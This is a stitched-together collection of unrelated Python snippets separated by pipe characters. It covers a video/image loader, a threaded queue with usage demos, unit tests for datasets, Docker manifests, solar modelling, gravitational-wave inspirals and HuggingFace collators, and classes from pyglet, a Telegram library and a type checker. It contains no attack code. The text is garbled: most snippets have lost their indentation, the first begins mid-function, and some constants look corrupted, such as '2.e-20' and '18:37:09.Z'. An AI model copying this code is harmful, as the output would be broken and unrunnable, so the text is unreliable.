err = 'ERROR: The {} location {} could not be found'.format(loadtype, self.folder)
if err:
logger.error(err)
exit(0)
if ((loadtype == 'Frames') and os.path.isfile(self.folder) and (os.path.splitext(self.folder)[1].lower() in _video_extensions)):
logger.verbose("Video exists at: '%s'", self.folder)
retval = cv2.VideoCapture(self.folder)
else:
logger.verbose("Folder exists at '%s'", self.folder)
retval = None
return retval
@staticmethod
def valid_extension(filename):
extension = os.path.splitext(filename)[1]
retval = (extension.lower() in _image_extensions)
logger.trace("Filename has valid extension: '%s': %s", filename, retval)
return retval
@staticmethod
def sorted_items():
return list()
@staticmethod
def process_folder():
return list()
@staticmethod
def load_items():
return dict()
def load_image(self, filename):
if self.is_video:
image = self.load_video_frame(filename)
else:
src = os.path.join(self.folder, filename)
logger.trace("Loading image: '%s'", src)
image = cv2_read_img(src, raise_error=True)
return image
def load_video_frame(self, filename):
frame = os.path.splitext(filename)[0]
logger.trace("Loading video frame: '%s'", frame)
frame_no = (int(frame[(frame.rfind('_') + 1):]) - 1)
self.vid_reader.set(cv2.CAP_PROP_POS_FRAMES, frame_no)
(_, image) = self.vid_reader.read()
return image
@staticmethod
def save_image(output_folder, filename, image):
output_file = os.path.join(output_folder, filename)
logger.trace("Saving image: '%s'", output_file)
cv2.imwrite(output_file, image) |
class PackageQueue(object):
class Empty(Exception):
def __init__(self):
Exception.__init__(self, 'pop from an empty PackageQueue')
def __init__(self, N, discard_mode='old'):
self._q = deque()
self._condition = threading.Condition()
self._maxlen = int(N)
discard_mode = discard_mode.lower()
if (discard_mode == 'old'):
self._discard_mode = 1
elif (discard_mode == 'new'):
self._discard_mode = 2
else:
raise ValueError('Invalid discard mode.')
def full(self):
return (len(self) >= self._maxlen)
def empty(self):
return (len(self) == 0)
def push(self, x):
condition = self._condition
condition.acquire()
try:
q = self._q
if (len(q) < self._maxlen):
q.append(x)
condition.notify()
elif (self._discard_mode == 1):
q.popleft()
q.append(x)
elif (self._discard_mode == 2):
pass
finally:
condition.release()
def insert(self, x):
condition = self._condition
condition.acquire()
try:
self._q.appendleft(x)
condition.notify()
finally:
condition.release()
def pop(self, block=True):
condition = self._condition
condition.acquire()
try:
q = self._q
if (not block):
if (not len(q)):
raise self.Empty()
elif (block is True):
while (not len(q)):
condition.wait()
elif isinstance(block, float):
if (not len(q)):
condition.wait(block)
if (not len(q)):
raise self.Empty()
else:
raise ValueError('Invalid value for block in PackageQueue.pop().')
return q.popleft()
finally:
condition.release()
def peek(self, index=0):
return self._q[index]
def __len__(self):
return self._q.__len__()
def clear(self):
self._condition.acquire()
try:
self._q.clear()
finally:
self._condition.release() |
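# Threaded smoke test for the PackageQueue above (assumed in scope): in 'old'
# discard mode a full queue drops its oldest items, and pop() blocks until a
# producer pushes.
import threading
q = PackageQueue(3, discard_mode='old')
for i in range(5):
    q.push(i)  # 0 and 1 get discarded once the queue is full
print([q.pop(block=False) for _ in range(len(q))])  # [2, 3, 4]
threading.Timer(0.1, lambda: q.push('late item')).start()
print(q.pop())  # blocks ~0.1s, then prints 'late item' |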
class TestAgentInsert(unittest.TestCase):
def _get_simple_dataset(self) -> ChunkedDataset:
dataset = ChunkedDataset('')
dataset.scenes = np.zeros(1, dtype=SCENE_DTYPE)
dataset.frames = np.zeros(3, dtype=FRAME_DTYPE)
dataset.agents = np.zeros(6, dtype=AGENT_DTYPE)
dataset.scenes[0]['frame_index_interval'] = (0, 3)
dataset.frames['agent_index_interval'] = [(0, 3), (3, 5), (5, 6)]
dataset.agents['track_id'] = [0, 1, 2, 0, 1, 0]
return dataset
def test_invalid(self) -> None:
with self.assertRaises(ValueError):
insert_agent(np.zeros(1, dtype=AGENT_DTYPE), 100, self._get_simple_dataset())
with self.assertRaises(ValueError):
dataset = self._get_simple_dataset()
dataset.scenes = np.concatenate([dataset.scenes, dataset.scenes])
insert_agent(np.zeros(1, dtype=AGENT_DTYPE), 100, dataset)
def test_update(self) -> None:
dataset = self._get_simple_dataset()
agent = np.zeros(1, dtype=AGENT_DTYPE)
agent['centroid'] = (1, 1)
agent['yaw'] = 1
agent['label_probabilities'] += 1
insert_agent(agent, 0, dataset)
self.assertTrue(np.allclose(agent['centroid'], dataset.agents[0]['centroid']))
self.assertTrue(np.allclose(agent['yaw'], dataset.agents[0]['yaw']))
self.assertTrue(np.allclose(agent['label_probabilities'], dataset.agents[0]['label_probabilities']))
self.assertEqual(len(dataset.agents), len(self._get_simple_dataset().agents))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'], self._get_simple_dataset().frames['agent_index_interval']))
def test_insert_1(self) -> None:
dataset = self._get_simple_dataset()
agent = np.zeros(1, dtype=AGENT_DTYPE)
agent['centroid'] = (1, 1)
agent['yaw'] = 1
agent['label_probabilities'] += 1
agent['track_id'] += 2
insert_agent(agent, 1, dataset)
expected_index = 5
self.assertTrue(np.allclose(agent['centroid'], dataset.agents[expected_index]['centroid']))
self.assertTrue(np.allclose(agent['yaw'], dataset.agents[expected_index]['yaw']))
self.assertTrue(np.allclose(agent['label_probabilities'], dataset.agents[expected_index]['label_probabilities']))
old_dataset = self._get_simple_dataset()
self.assertEqual(len(dataset.agents), (len(old_dataset.agents) + 1))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][:1], old_dataset.frames['agent_index_interval'][:1]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][(1, 0)], old_dataset.frames['agent_index_interval'][(1, 0)]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][(1, 1)], (old_dataset.frames['agent_index_interval'][(1, 1)] + 1)))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][2:], (old_dataset.frames['agent_index_interval'][2:] + 1)))
def test_insert_2(self) -> None:
dataset = self._get_simple_dataset()
agent = np.zeros(1, dtype=AGENT_DTYPE)
agent['centroid'] = (1, 1)
agent['yaw'] = 1
agent['label_probabilities'] += 1
agent['track_id'] += 1
insert_agent(agent, 2, dataset)
expected_index = (- 1)
self.assertTrue(np.allclose(agent['centroid'], dataset.agents[expected_index]['centroid']))
self.assertTrue(np.allclose(agent['yaw'], dataset.agents[expected_index]['yaw']))
self.assertTrue(np.allclose(agent['label_probabilities'], dataset.agents[expected_index]['label_probabilities']))
old_dataset = self._get_simple_dataset()
self.assertEqual(len(dataset.agents), (len(old_dataset.agents) + 1))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][:(- 1)], old_dataset.frames['agent_index_interval'][:(- 1)]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][((- 1), 0)], old_dataset.frames['agent_index_interval'][((- 1), 0)]))
self.assertTrue(np.allclose(dataset.frames['agent_index_interval'][((- 1), 1)], (old_dataset.frames['agent_index_interval'][((- 1), 1)] + 1))) |
def test_create_manifest_cannot_load_config_blob(initialized_db):
repository = create_repository('devtable', 'newrepo', None)
layer_json = json.dumps({'config': {}, 'rootfs': {'type': 'layers', 'diff_ids': []}, 'history': [{'created': '2018-04-03T18:37:09.Z', 'created_by': 'do something'}]})
(_, config_digest) = _populate_blob(layer_json)
random_data = 'hello world'
(_, random_digest) = _populate_blob(random_data)
remote_digest = sha256_digest(b'something')
builder = DockerSchema2ManifestBuilder()
builder.set_config_digest(config_digest, len(layer_json.encode('utf-8')))
builder.add_layer(random_digest, len(random_data.encode('utf-8')))
manifest = builder.build()
broken_retriever = BrokenRetriever()
with pytest.raises(CreateManifestException):
get_or_create_manifest(repository, manifest, storage, retriever=broken_retriever, raise_on_error=True) |
def test_run_model_singleton_weather_single_array(cec_dc_snl_ac_system, location, weather):
mc = ModelChain(cec_dc_snl_ac_system, location, aoi_model='no_loss', spectral_model='no_loss')
mc.run_model([weather])
assert isinstance(mc.results.weather, tuple)
assert isinstance(mc.results.total_irrad, tuple)
assert isinstance(mc.results.aoi, tuple)
assert isinstance(mc.results.aoi_modifier, tuple)
assert isinstance(mc.results.spectral_modifier, tuple)
assert isinstance(mc.results.effective_irradiance, tuple)
assert isinstance(mc.results.dc, tuple)
assert isinstance(mc.results.cell_temperature, tuple)
assert (len(mc.results.cell_temperature) == 1)
assert isinstance(mc.results.cell_temperature[0], pd.Series) |
@cmdutils.register(maxsplit=1, no_cmd_split=True, no_replace_variables=True, deprecated_name='repeat')
@cmdutils.argument('win_id', value=cmdutils.Value.win_id)
@cmdutils.argument('count', value=cmdutils.Value.count)
def cmd_repeat(times: int, command: str, win_id: int, count: int=None) -> None:
if (count is not None):
times *= count
if (times < 0):
raise cmdutils.CommandError("A negative count doesn't make sense.")
commandrunner = runners.CommandRunner(win_id)
for _ in range(times):
commandrunner.run_safely(command) |
def test_inspiralfuns_numerical():
logMc = 1.4
q = 0.8
flow = 10.0
merger_type = 'BH'
D = 100.0
(M, eta) = ins.get_M_and_eta(logMc=logMc, q=q)
start_x = ins.startx(M, flow)
end_x = ins.endx(eta, merger_type)
(x, xtimes, dt) = ins.PN_parameter_integration(start_x, end_x, M, eta)
assert (len(x) == 2133591), 'The length of x is not as expected.'
(i_phase, omega, freq) = ins.inspiral_phase_freq_integration(x, dt, M)
(r, rdot) = ins.radius_calculation(x, M, eta)
(A1, A2) = ins.a1_a2_calculation(r, rdot, omega, D, M, eta)
(Aorth, Adiag) = ins.inspiral_strain_polarisations(A1, A2, i_phase)
i_amp = ins.inspiral_strain_amplitude(Aorth, Adiag)
assert np.isclose(i_amp[2133590], 2.e-20), 'The final value of i_amp is not as expected.'
print('test_inspiralfuns_numerical completed successfully') |
class NumpyDataCollatorIntegrationTest(unittest.TestCase):
def setUp(self):
self.tmpdirname = tempfile.mkdtemp()
vocab_tokens = ['[UNK]', '[CLS]', '[SEP]', '[PAD]', '[MASK]']
self.vocab_file = os.path.join(self.tmpdirname, 'vocab.txt')
with open(self.vocab_file, 'w', encoding='utf-8') as vocab_writer:
vocab_writer.write(''.join([(x + '\n') for x in vocab_tokens]))
def tearDown(self):
shutil.rmtree(self.tmpdirname)
def test_default_with_dict(self):
features = [{'label': i, 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].tolist(), list(range(8)))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 6))
features = [{'label_ids': [0, 1, 2], 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].tolist(), ([[0, 1, 2]] * 8))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 6))
features = [{'label': i, 'inputs': np.random.randint(0, 10, [10])} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].tolist(), list(range(8)))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 10))
features = [{'label': np.array(i), 'inputs': np.random.randint(0, 10, [10])} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['labels'].tolist(), list(range(8)))
self.assertEqual(batch['labels'].dtype, np.int64)
self.assertEqual(batch['inputs'].shape, (8, 10))
def test_default_classification_and_regression(self):
data_collator = default_data_collator
features = [{'input_ids': [0, 1, 2, 3, 4], 'label': i} for i in range(4)]
batch = data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].dtype, np.int64)
features = [{'input_ids': [0, 1, 2, 3, 4], 'label': float(i)} for i in range(4)]
batch = data_collator(features, return_tensors='np')
self.assertEqual(batch['labels'].dtype, np.float32)
def test_default_with_no_labels(self):
features = [{'label': None, 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertTrue(('labels' not in batch))
self.assertEqual(batch['inputs'].shape, (8, 6))
features = [{'label_ids': None, 'inputs': [0, 1, 2, 3, 4, 5]} for i in range(8)]
batch = default_data_collator(features, return_tensors='np')
self.assertTrue(('labels' not in batch))
self.assertEqual(batch['inputs'].shape, (8, 6))
def test_data_collator_with_padding(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': [0, 1, 2]}, {'input_ids': [0, 1, 2, 3, 4, 5]}]
data_collator = DataCollatorWithPadding(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 6))
self.assertEqual(batch['input_ids'][0].tolist(), ([0, 1, 2] + ([tokenizer.pad_token_id] * 3)))
data_collator = DataCollatorWithPadding(tokenizer, padding='max_length', max_length=10, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
def test_data_collator_for_token_classification(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': [0, 1, 2], 'labels': [0, 1, 2]}, {'input_ids': [0, 1, 2, 3, 4, 5], 'labels': [0, 1, 2, 3, 4, 5]}]
data_collator = DataCollatorForTokenClassification(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 6))
self.assertEqual(batch['input_ids'][0].tolist(), ([0, 1, 2] + ([tokenizer.pad_token_id] * 3)))
self.assertEqual(batch['labels'].shape, (2, 6))
self.assertEqual(batch['labels'][0].tolist(), ([0, 1, 2] + ([(- 100)] * 3)))
data_collator = DataCollatorForTokenClassification(tokenizer, padding='max_length', max_length=10, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
data_collator = DataCollatorForTokenClassification(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
self.assertEqual(batch['labels'].shape, (2, 8))
data_collator = DataCollatorForTokenClassification(tokenizer, label_pad_token_id=(- 1), return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 6))
self.assertEqual(batch['input_ids'][0].tolist(), ([0, 1, 2] + ([tokenizer.pad_token_id] * 3)))
self.assertEqual(batch['labels'].shape, (2, 6))
self.assertEqual(batch['labels'][0].tolist(), ([0, 1, 2] + ([(- 1)] * 3)))
def _test_no_pad_and_pad(self, no_pad_features, pad_features):
tokenizer = BertTokenizer(self.vocab_file)
data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
batch = data_collator(pad_features, return_tensors='np')
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
batch = data_collator(pad_features, return_tensors='np')
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
tokenizer._pad_token = None
data_collator = DataCollatorForLanguageModeling(tokenizer, mlm=False, return_tensors='np')
with self.assertRaises(ValueError):
data_collator(pad_features)
set_seed(42)
tokenizer = BertTokenizer(self.vocab_file)
data_collator = DataCollatorForLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
batch = data_collator(pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
data_collator = DataCollatorForLanguageModeling(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(no_pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
batch = data_collator(pad_features)
self.assertEqual(batch['input_ids'].shape, (2, 16))
self.assertEqual(batch['labels'].shape, (2, 16))
masked_tokens = (batch['input_ids'] == tokenizer.mask_token_id)
self.assertTrue(np.any(masked_tokens))
def test_data_collator_for_language_modeling(self):
no_pad_features = [{'input_ids': list(range(10))}, {'input_ids': list(range(10))}]
pad_features = [{'input_ids': list(range(5))}, {'input_ids': list(range(10))}]
self._test_no_pad_and_pad(no_pad_features, pad_features)
no_pad_features = [list(range(10)), list(range(10))]
pad_features = [list(range(5)), list(range(10))]
self._test_no_pad_and_pad(no_pad_features, pad_features)
def test_data_collator_for_whole_word_mask(self):
tokenizer = BertTokenizer(self.vocab_file)
data_collator = DataCollatorForWholeWordMask(tokenizer, return_tensors='np')
features = [{'input_ids': list(range(10))}, {'input_ids': list(range(10))}]
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
features = [{'input_ids': np.arange(10)}, {'input_ids': np.arange(10)}]
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
def test_plm(self):
tokenizer = BertTokenizer(self.vocab_file)
no_pad_features = [{'input_ids': list(range(10))}, {'input_ids': list(range(10))}]
pad_features = [{'input_ids': list(range(5))}, {'input_ids': list(range(10))}]
data_collator = DataCollatorForPermutationLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(pad_features)
self.assertIsInstance(batch, dict)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['perm_mask'].shape, (2, 10, 10))
self.assertEqual(batch['target_mapping'].shape, (2, 10, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
batch = data_collator(no_pad_features)
self.assertIsInstance(batch, dict)
self.assertEqual(batch['input_ids'].shape, (2, 10))
self.assertEqual(batch['perm_mask'].shape, (2, 10, 10))
self.assertEqual(batch['target_mapping'].shape, (2, 10, 10))
self.assertEqual(batch['labels'].shape, (2, 10))
example = [np.random.randint(0, 5, [5])]
with self.assertRaises(ValueError):
data_collator(example)
def test_nsp(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': [0, 1, 2, 3, 4], 'token_type_ids': [0, 1, 2, 3, 4], 'next_sentence_label': i} for i in range(2)]
data_collator = DataCollatorForLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 5))
self.assertEqual(batch['token_type_ids'].shape, (2, 5))
self.assertEqual(batch['labels'].shape, (2, 5))
self.assertEqual(batch['next_sentence_label'].shape, (2,))
data_collator = DataCollatorForLanguageModeling(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
self.assertEqual(batch['token_type_ids'].shape, (2, 8))
self.assertEqual(batch['labels'].shape, (2, 8))
self.assertEqual(batch['next_sentence_label'].shape, (2,))
def test_sop(self):
tokenizer = BertTokenizer(self.vocab_file)
features = [{'input_ids': np.array([0, 1, 2, 3, 4]), 'token_type_ids': np.array([0, 1, 2, 3, 4]), 'sentence_order_label': i} for i in range(2)]
data_collator = DataCollatorForLanguageModeling(tokenizer, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 5))
self.assertEqual(batch['token_type_ids'].shape, (2, 5))
self.assertEqual(batch['labels'].shape, (2, 5))
self.assertEqual(batch['sentence_order_label'].shape, (2,))
data_collator = DataCollatorForLanguageModeling(tokenizer, pad_to_multiple_of=8, return_tensors='np')
batch = data_collator(features)
self.assertEqual(batch['input_ids'].shape, (2, 8))
self.assertEqual(batch['token_type_ids'].shape, (2, 8))
self.assertEqual(batch['labels'].shape, (2, 8))
self.assertEqual(batch['sentence_order_label'].shape, (2,)) |
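# Hedged usage sketch for the collators exercised above: assumes a BERT vocab
# file at ./vocab.txt (hypothetical path) and the transformers library.
from transformers import BertTokenizer, DataCollatorForLanguageModeling

tokenizer = BertTokenizer('./vocab.txt')
collator = DataCollatorForLanguageModeling(tokenizer, mlm_probability=0.15, return_tensors='np')
features = [{'input_ids': list(range(5))}, {'input_ids': list(range(10))}]
batch = collator(features)
# The shorter example is padded up to the longest sequence in the batch.
assert batch['input_ids'].shape == (2, 10) |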
class CsvLogger():
def __init__(self, filepath='./', filename='validate_record.csv', data=None, fieldsnames=['epoch', 'train_loss', 'val_loss', 'Bleu_4', 'METEOR', 'ROUGE_L', 'CIDEr']):
self.log_path = filepath
if (not os.path.exists(filepath)):
os.makedirs(filepath)
if filename:
self.log_name = filename
self.csv_path = os.path.join(self.log_path, self.log_name)
self.fieldsnames = fieldsnames
if (not os.path.exists(self.csv_path)):
with open(self.csv_path, 'w') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writeheader()
self.data = {}
for field in self.fieldsnames:
self.data[field] = []
if (data is not None):
for d in data:
d_num = {}
for key in d:
d_num[key] = (float(d[key]) if (key != 'epoch') else int(d[key]))
self.write(d_num)
def write(self, data):
for k in self.data:
self.data[k].append(data[k])
data = {k: v for (k, v) in data.items() if (k in self.data.keys())}
with open(self.csv_path, 'a') as f:
writer = csv.DictWriter(f, fieldnames=self.fieldsnames)
writer.writerow(data)
def write_text(self, text, print_t=True):
with open(os.path.join(self.log_path, 'log.txt'), 'a') as f:
f.write('{}\n'.format(text))
if print_t:
tqdm.write(text) |
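# A minimal sketch of driving CsvLogger from a training loop; the metric
# values are illustrative only. Assumes os, csv and tqdm are imported as the
# class above expects.
logger = CsvLogger(filepath='./logs', filename='validate_record.csv')
logger.write({'epoch': 1, 'train_loss': 0.91, 'val_loss': 0.87, 'Bleu_4': 0.12, 'METEOR': 0.18, 'ROUGE_L': 0.33, 'CIDEr': 0.41})
logger.write_text('finished epoch 1') |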
def test_append_with_list_input():
context = Context({'arblist': [1, 2], 'append': {'list': PyString('arblist'), 'addMe': 3}})
append.run_step(context)
context['append']['addMe'] = 4
append.run_step(context)
assert (context['arblist'] == [1, 2, 3, 4])
assert (len(context) == 2) |
class SourceGroup():
def __init__(self) -> None:
self.audio_format = None
self.video_format = None
self.info = None
self.duration = 0.0
self._timestamp_offset = 0.0
self._dequeued_durations = []
self._sources = []
self.is_player_source = False
def is_precise(self) -> bool:
return False
def seek(self, time: float) -> None:
if self._sources:
self._sources[0].seek(time)
def add(self, source: Source) -> None:
self.audio_format = (self.audio_format or source.audio_format)
self.info = (self.info or source.info)
source = source.get_queue_source()
assert (source.audio_format == self.audio_format), 'Sources must share the same audio format.'
self._sources.append(source)
self.duration += source.duration
def has_next(self) -> bool:
return (len(self._sources) > 1)
def get_queue_source(self) -> 'SourceGroup':
return self
def _advance(self) -> None:
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
if isinstance(old_source, StreamingSource):
old_source.delete()
def get_audio_data(self, num_bytes: int, compensation_time=0.0) -> Optional[AudioData]:
if (not self._sources):
return None
buffer = b''
duration = 0.0
timestamp = 0.0
while ((len(buffer) < num_bytes) and self._sources):
audiodata = self._sources[0].get_audio_data(num_bytes)
if audiodata:
buffer += audiodata.data
duration += audiodata.duration
timestamp += self._timestamp_offset
else:
self._advance()
return AudioData(buffer, len(buffer), timestamp, duration) |
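# A rough sketch of gapless chaining with SourceGroup, assuming two
# pyglet-loadable audio files with identical formats (file names are
# placeholders).
import pyglet

group = SourceGroup()
group.add(pyglet.media.load('a.wav'))
group.add(pyglet.media.load('b.wav'))
# Reads cross source boundaries: when the first source is exhausted,
# _advance() pops it and reading continues from the next one.
data = group.get_audio_data(4096) |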
class InlineQueryResultAudio(InlineQueryResult):
__slots__ = ('reply_markup', 'caption_entities', 'caption', 'title', 'parse_mode', 'audio_url', 'performer', 'input_message_content', 'audio_duration')
def __init__(self, id: str, audio_url: str, title: str, performer: Optional[str]=None, audio_duration: Optional[int]=None, caption: Optional[str]=None, reply_markup: Optional[InlineKeyboardMarkup]=None, input_message_content: Optional['InputMessageContent']=None, parse_mode: ODVInput[str]=DEFAULT_NONE, caption_entities: Optional[Sequence[MessageEntity]]=None, *, api_kwargs: Optional[JSONDict]=None):
super().__init__(InlineQueryResultType.AUDIO, id, api_kwargs=api_kwargs)
with self._unfrozen():
self.audio_url: str = audio_url
self.title: str = title
self.performer: Optional[str] = performer
self.audio_duration: Optional[int] = audio_duration
self.caption: Optional[str] = caption
self.parse_mode: ODVInput[str] = parse_mode
self.caption_entities: Tuple[(MessageEntity, ...)] = parse_sequence_arg(caption_entities)
self.reply_markup: Optional[InlineKeyboardMarkup] = reply_markup
self.input_message_content: Optional[InputMessageContent] = input_message_content |
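# A construction sketch for the inline result above; the id and URL are
# placeholders, not real Telegram data.
result = InlineQueryResultAudio(
    id='1',
    audio_url='https://example.com/track.mp3',
    title='Track',
    performer='Some Artist',
    audio_duration=215,
)
print(result.audio_url, result.audio_duration) |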
class ArgSpecCache():
DEFAULT_ARGSPECS = implementation.get_default_argspecs()
def __init__(self, options: Options, ts_finder: TypeshedFinder, ctx: CanAssignContext, *, vnv_provider: Callable[([str], Optional[Value])]=(lambda _: None)) -> None:
self.vnv_provider = vnv_provider
self.options = options
self.ts_finder = ts_finder
self.ctx = ctx
self.known_argspecs = {}
self.generic_bases_cache = {}
self.default_context = AnnotationsContext(self)
self.safe_bases = tuple(self.options.get_value_for(ClassesSafeToInstantiate))
default_argspecs = dict(self.DEFAULT_ARGSPECS)
for provider in _BUILTIN_KNOWN_SIGNATURES:
default_argspecs.update(provider(self))
for provider in options.get_value_for(KnownSignatures):
default_argspecs.update(provider(self))
for (obj, argspec) in default_argspecs.items():
self.known_argspecs[obj] = argspec
def from_signature(self, sig: inspect.Signature, *, impl: Optional[Impl]=None, callable_object: object, function_object: object, is_async: bool=False, is_asynq: bool=False, returns: Optional[Value]=None, allow_call: bool=False) -> Signature:
func_globals = getattr(function_object, '__globals__', None)
is_wrapped = hasattr_static(function_object, '__wrapped__')
if (returns is not None):
has_return_annotation = True
else:
if (is_wrapped or (sig.return_annotation is inspect.Signature.empty)):
returns = AnyValue(AnySource.unannotated)
has_return_annotation = False
else:
returns = type_from_runtime(sig.return_annotation, ctx=AnnotationsContext(self, func_globals))
has_return_annotation = True
if is_async:
returns = make_coro_type(returns)
parameters = []
for (i, parameter) in enumerate(sig.parameters.values()):
(param, make_everything_pos_only) = self._make_sig_parameter(parameter, func_globals, function_object, is_wrapped, i)
if make_everything_pos_only:
parameters = [replace(param, kind=ParameterKind.POSITIONAL_ONLY) for param in parameters]
parameters.append(param)
return Signature.make(parameters, returns, impl=impl, callable=callable_object, has_return_annotation=has_return_annotation, is_asynq=is_asynq, allow_call=(allow_call or FunctionsSafeToCall.contains(callable_object, self.options)))
def _make_sig_parameter(self, parameter: inspect.Parameter, func_globals: Optional[Mapping[(str, object)]], function_object: Optional[object], is_wrapped: bool, index: int) -> Tuple[(SigParameter, bool)]:
if is_wrapped:
typ = AnyValue(AnySource.inference)
else:
typ = self._get_type_for_parameter(parameter, func_globals, function_object, index)
if (parameter.default is inspect.Parameter.empty):
default = None
else:
default = KnownValue(parameter.default)
if ((parameter.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD) and is_positional_only_arg_name(parameter.name, _get_class_name(function_object))):
kind = ParameterKind.POSITIONAL_ONLY
make_everything_pos_only = True
else:
kind = ParameterKind(parameter.kind)
make_everything_pos_only = False
return (SigParameter(parameter.name, kind, default=default, annotation=typ), make_everything_pos_only)
def _get_type_for_parameter(self, parameter: inspect.Parameter, func_globals: Optional[Mapping[(str, object)]], function_object: Optional[object], index: int) -> Value:
if (parameter.annotation is not inspect.Parameter.empty):
kind = ParameterKind(parameter.kind)
ctx = AnnotationsContext(self, func_globals)
typ = type_from_runtime(parameter.annotation, ctx=ctx, allow_unpack=kind.allow_unpack())
return translate_vararg_type(kind, typ, self.ctx)
elif ((index == 0) and (parameter.kind in (inspect.Parameter.POSITIONAL_ONLY, inspect.Parameter.POSITIONAL_OR_KEYWORD))):
module_name = getattr(function_object, '__module__', None)
qualname = getattr(function_object, '__qualname__', None)
name = getattr(function_object, '__name__', None)
if ((qualname != name) and (module_name is not None) and (module_name in sys.modules)):
module = sys.modules[module_name]
(*class_names, function_name) = qualname.split('.')
class_obj = module
for class_name in class_names:
class_obj = getattr(class_obj, class_name, None)
if (class_obj is None):
break
if (isinstance(class_obj, type) and (inspect.getattr_static(class_obj, function_name, None) is function_object)):
generic_bases = self._get_generic_bases_cached(class_obj)
if (generic_bases and generic_bases.get(class_obj)):
return GenericValue(class_obj, generic_bases[class_obj].values())
return TypedValue(class_obj)
if (parameter.kind in (inspect.Parameter.POSITIONAL_ONLY, inspect.Parameter.POSITIONAL_OR_KEYWORD, inspect.Parameter.KEYWORD_ONLY)):
vnv = self.vnv_provider(parameter.name)
if (vnv is not None):
return vnv
return AnyValue(AnySource.unannotated)
def get_argspec(self, obj: object, impl: Optional[Impl]=None, is_asynq: bool=False, allow_synthetic_type: bool=False) -> MaybeSignature:
if (safe_isinstance(obj, str) and (not allow_synthetic_type)):
return None
return self._cached_get_argspec(obj, impl, is_asynq, in_overload_resolution=False)
def get_concrete_signature(self, obj: object, impl: Optional[Impl]=None, *, allow_call: bool=False) -> Signature:
sig = self.get_argspec(obj, impl=impl)
if (not isinstance(sig, Signature)):
raise TypeError(f'failed to find a concrete signature for {obj}')
return replace(sig, allow_call=allow_call)
